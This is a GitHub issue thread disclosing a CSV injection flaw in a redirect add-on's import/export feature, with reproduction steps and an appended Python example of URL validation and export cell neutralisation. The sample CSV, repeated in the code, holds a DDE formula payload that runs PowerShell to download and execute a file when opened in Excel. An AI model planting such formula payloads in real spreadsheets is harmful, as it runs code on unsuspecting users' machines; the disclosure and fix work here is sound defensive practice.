
CSV Import / Export lacks validation and allows executable code to be added to uploaded / downloaded

Open GeekInTheNorth opened this issue 7 months ago • 4 comments

We have had an issue raised in a penetration test which proved that there was a CSV Injection attack possible on the CSV import / export functionality of this Add-On.

How to Reproduce:

  • Import redirects using a CSV which contains a CSV injection attack within one of the URL fields.
  • Export redirects into a CSV file
  • Open the CSV file in excel

The penetration tester was able to use CSV injection to push a PowerShell command into the database. When the CSV was then exported and opened in Excel, the PowerShell script executed to download a file to the system.

This can be fixed by adding a simple URL validation for the Old and New URL fields and rejecting the CSV if any of the entries are invalid.

GeekInTheNorth avatar Jun 13 '25 16:06 GeekInTheNorth

@GeekInTheNorth possible to share somehow file samples?

valdisiljuconoks avatar Jun 17 '25 05:06 valdisiljuconoks

Hi @valdisiljuconoks,

I'll verify first with my client to make sure they are happy for anonymised details to be shared.

GeekInTheNorth avatar Jun 17 '25 07:06 GeekInTheNorth

Hi @valdisiljuconoks

I have been able to manufacture the same attack without needing to share screen captures from the report.

You'll need a CSV with this content:

OldUrl,NewUrl,WildcardSkippedAppend,RedirectType
https://www.example.com/missing-page,https://www.example.com/new-page/,False,Temporary
https://www.example.com/malicious-test/,=cmd|'/C powershell IEX(wget http://www.example.com/eicar.exe -OutFile eicar.exe)'!AO,False,Temporary

The import function has no validation, which then allows you to upload the CSV with its malicious content:

Image

When the user then exports the redirects and opens them in Excel, they receive prompts, but the user may well accept them as the CSV has come from a trusted source as far as they are concerned.

Image

Image

The simplest thing we can do here is to apply a URL verification on the CSV before we push it into the database. I haven't tested if the same can be achieved through the XML import / export, but the same validation would help.

Regards, Mark Stott

GeekInTheNorth avatar Jun 17 '25 08:06 GeekInTheNorth

@valdisiljuconoks

It also turns out you can perform this attack directly in the UI, as neither the Old nor the New URL field has validation:

Image

GeekInTheNorth avatar Jun 19 '25 13:06 GeekInTheNorth
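The thread proposes two controls: validate the OldUrl / NewUrl fields on import (and in the UI) and reject the whole file if any entry is invalid, and, as defence in depth, make sure exported cells can never be interpreted as formulas by a spreadsheet. The following Python is an added illustration of both controls, written for this issue; it is not code from the Geta NotFoundHandler project. The column names come from the CSV sample above; the set of accepted redirect URL shapes (absolute http(s) URLs or site-relative paths) and the formula-prefix list are assumptions taken from common CSV-injection guidance rather than from the add-on.

```python
import csv
import io
from urllib.parse import urlparse

# Leading characters that Excel / LibreOffice treat as the start of a formula.
# Assumption: list taken from common CSV-injection guidance, not from the add-on.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

# Column layout as used by the CSV sample in this thread.
REQUIRED_COLUMNS = ("OldUrl", "NewUrl", "WildcardSkippedAppend", "RedirectType")
URL_COLUMNS = ("OldUrl", "NewUrl")
ALLOWED_SCHEMES = {"http", "https"}


def is_valid_redirect_url(value: str) -> bool:
    """Accept an absolute http(s) URL or a site-relative path, nothing else.

    The injected payload fails both branches: it starts with '=' and is not a
    parseable http(s) URL. This is the check a UI form would call as well.
    """
    if not value or value[:1] in FORMULA_PREFIXES:
        return False
    if any(ch.isspace() or ord(ch) < 32 for ch in value):
        return False
    if value.startswith("/"):
        return True  # site-relative path (assumption: accepted by the handler)
    parsed = urlparse(value)
    return parsed.scheme in ALLOWED_SCHEMES and bool(parsed.netloc)


def validate_import(csv_text: str) -> list[str]:
    """Return error messages; an empty list means the CSV may be imported.

    Mirrors the proposal in the thread: every row is checked and the whole
    file is rejected if any entry is invalid. Non-URL columns are still
    screened for formula prefixes so nothing formula-like reaches the database.
    """
    errors = []
    reader = csv.DictReader(io.StringIO(csv_text))
    missing = [c for c in REQUIRED_COLUMNS if c not in (reader.fieldnames or [])]
    if missing:
        return [f"missing columns: {', '.join(missing)}"]
    for line_no, row in enumerate(reader, start=2):  # header is line 1
        for column, value in row.items():
            if column is None or value is None:
                continue  # ragged row; DictReader puts extras under None
            if column in URL_COLUMNS:
                if not is_valid_redirect_url(value):
                    errors.append(
                        f"line {line_no}: {column} is not a valid http(s) URL "
                        f"or site-relative path"
                    )
            elif value[:1] in FORMULA_PREFIXES:
                errors.append(f"line {line_no}: {column} starts with a formula character")
    return errors


def neutralize_cell(value: str) -> str:
    """Export-side hardening: prefix a single quote so a spreadsheet reads the
    cell as text. Applied only to cells that would otherwise parse as formulas,
    so normal URLs round-trip unchanged."""
    if value[:1] in FORMULA_PREFIXES:
        return "'" + value
    return value


def export_redirects(rows: list[dict]) -> str:
    """Write redirects to CSV text with every cell neutralised."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=REQUIRED_COLUMNS, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(str(row.get(k, ""))) for k in REQUIRED_COLUMNS})
    return buf.getvalue()


# Constructed sample input: the CSV posted in this thread.
SAMPLE_CSV = (
    "OldUrl,NewUrl,WildcardSkippedAppend,RedirectType\n"
    "https://www.example.com/missing-page,https://www.example.com/new-page/,False,Temporary\n"
    "https://www.example.com/malicious-test/,=cmd|'/C powershell IEX(wget "
    "http://www.example.com/eicar.exe -OutFile eicar.exe)'!AO,False,Temporary\n"
)

if __name__ == "__main__":
    for err in validate_import(SAMPLE_CSV):
        print("rejected:", err)
```

With the thread's CSV the import is rejected at line 3 on the NewUrl column, so nothing reaches the database; `export_redirects` is the belt-and-braces layer for records that were stored before the validation existed, since a leading quote stops Excel from evaluating the cell even when the user clicks through the prompts shown in the screenshots.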